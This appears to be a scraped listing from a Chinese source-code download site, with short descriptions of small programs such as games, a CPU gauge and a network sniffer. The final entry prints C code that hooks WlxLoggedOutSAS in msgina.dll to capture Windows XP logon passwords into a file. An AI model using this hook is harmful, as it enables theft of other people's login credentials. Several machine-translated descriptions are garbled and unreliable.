-
基于Qt的CPU使用的的桌面仪表盘
基于Qt实现的一个小仪表盘,可以监测CPU使用率。双击可退出程序
- 2022-01-22 07:20:51下载
- 积分:1
-
学生信息 管理管学生信息管理理学生信息管理
学生信息 管理管学生信息管理理学生信息管理-Student Information Management Information Management students the rationale governing student information management
- 2022-03-30 14:23:36下载
- 积分:1
-
这是一款简易的五子棋软件,在visual basic下编程,
这是一款简易的五子棋软件,在visual basic下编程,-this is a game
- 2022-03-20 03:02:23下载
- 积分:1
-
This program executes a very precise test to determining if the user input is a...
This program executes a very precise test to determining if the user input is a number.
- 2023-06-03 07:05:03下载
- 积分:1
-
Windows Solitaire, cross
Windows纸牌,截面比较简陋。有兴趣的朋友,可以拓展。 -Windows Solitaire, cross-sectional comparisons simple. Interested friends, you can expand.
- 2022-02-04 01:03:20下载
- 积分:1
-
网络嗅探器源代码及文档
网络嗅探器源代码及文档,源自于csdn的某位作者,具体是这位不记得了,也可以到CSDN下载
- 2022-03-01 00:45:47下载
- 积分:1
-
通过模拟按键winIO接口的信息,其中有驱动的使用…
模拟按键 信息通过winio接口实现,里面有驱动源码 和 使用例子-Information through the analog button winio interface, which has driven the use of source and example
- 2022-03-20 16:12:40下载
- 积分:1
-
板球锦标赛游戏
这是游戏的传说玩互相反对,帮助他们各自的 eam 赢得,获得各自组中的一个点。T因国际,竞争是真的很难。
你在你的帮助你的团队是冠军的冠军。
- 2023-07-08 21:00:02下载
- 积分:1
-
vc++学习之――菜单加速键。源代码共享
vc++学习之――菜单加速键。源代码共享-vc learning-- menu accelerate bond. Source code sharing
- 2022-09-26 18:40:02下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1